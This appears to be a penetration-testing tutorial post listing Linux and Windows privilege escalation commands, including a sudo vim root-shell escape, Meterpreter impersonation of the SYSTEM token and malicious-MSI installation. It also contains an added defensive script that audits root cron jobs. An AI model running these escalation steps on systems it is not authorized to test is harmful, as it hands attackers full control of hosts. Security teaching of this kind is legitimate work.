
Privilege Escalation Techniques — Linux & Windows

Anuj Singh (Admin), 31 March 2026

Privilege Escalation — Low User to Root

After gaining initial access, escalating privileges is the next critical step. Without root or administrator rights, your impact on the host is limited.

Linux Privilege Escalation

SUID Binaries

find / -perm -4000 -type f 2>/dev/null
# Look for binaries such as: nmap, vim, find, bash, python
# See GTFOBins (gtfobins.github.io) for exploitation methods

Sudo Misconfigurations

sudo -l
# If you see: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'    # Root shell!

Cron Job Exploitation

cat /etc/crontab
ls -la /etc/cron*
# Find writable scripts executed by root
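
The cron check above, written as an audit for the system owner (an added example, not code from the original post): it parses a file in /etc/crontab format and reports files run by root whose own permissions or parent directory would let another user change them. The function names, the TRUSTED_UID variable and the sample crontab are assumptions constructed for this example.

```shell
#!/bin/sh
# Added example: list files run by root from cron that a non-root user could modify.
# Input: a file in /etc/crontab format (the variant with a user column).
TRUSTED_UID=${TRUSTED_UID:-0}   # assumed policy: root-run files are owned by uid 0

# Print every absolute path mentioned in root's job lines, de-duplicated.
root_cron_paths() {
  awk '
    NF == 0 || $1 ~ /^#/ { next }              # blank lines and comments
    $1 ~ /^[A-Za-z_][A-Za-z0-9_]*=/ { next }   # VAR=value settings
    { u = ($1 ~ /^@/) ? 2 : 6 }                # @daily-style lines have one time field
    $u == "root" {
      for (i = u + 1; i <= NF; i++)
        if ($i ~ /^\//) { sub(/[;&|]+$/, "", $i); print $i }
    }' "$1" | sort -u
}

# True if $1 is group- or world-writable, or not owned by TRUSTED_UID.
loosely_held() {
  [ -n "$(find "$1" -prune \( -perm -0020 -o -perm -0002 -o ! -user "$TRUSTED_UID" \) -print 2>/dev/null)" ]
}

# Report root cron targets whose file or parent directory is loosely held.
audit_root_cron() {
  root_cron_paths "$1" | while IFS= read -r p; do
    { [ -f "$p" ] || [ -d "$p" ]; } || continue   # skip /dev/null and missing paths
    for t in "$p" "$(dirname "$p")"; do
      if loosely_held "$t"; then echo "RISK $p ($t)"; break; fi
    done
  done
}

# Constructed sample: temp tree with one tight and one world-writable script.
make_sample() {
  d=$(mktemp -d) && mkdir "$d/jobs" && chmod 755 "$d/jobs"
  : > "$d/jobs/backup.sh"; chmod 755 "$d/jobs/backup.sh"
  : > "$d/jobs/rotate.sh"; chmod 777 "$d/jobs/rotate.sh"
  cat > "$d/crontab" <<EOF
# constructed sample in /etc/crontab format
PATH=/usr/sbin:/usr/bin
17 * * * * root $d/jobs/backup.sh > /dev/null
*/5 * * * * root $d/jobs/rotate.sh;
@daily root $d/jobs/backup.sh --full
0 3 * * * www-data $d/jobs/rotate.sh
EOF
  echo "$d"
}

if [ -n "${1:-}" ]; then audit_root_cron "$1"; fi   # e.g. sh audit.sh /etc/crontab
```

Per-user crontabs have no user column, so this parser applies only to /etc/crontab-style files.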

Kernel Exploits

uname -a
searchsploit linux kernel $(uname -r | cut -d- -f1)

Windows Privilege Escalation

Unquoted Service Paths

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

Token Impersonation

# Meterpreter
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If 1 (the policy takes effect only when the same value is also 1 under HKCU): create malicious MSI → install as SYSTEM

Automated Tools

  • LinPEAS: Linux privilege escalation scanner
  • WinPEAS: Windows privilege escalation scanner
  • PowerUp: PowerShell privesc checker
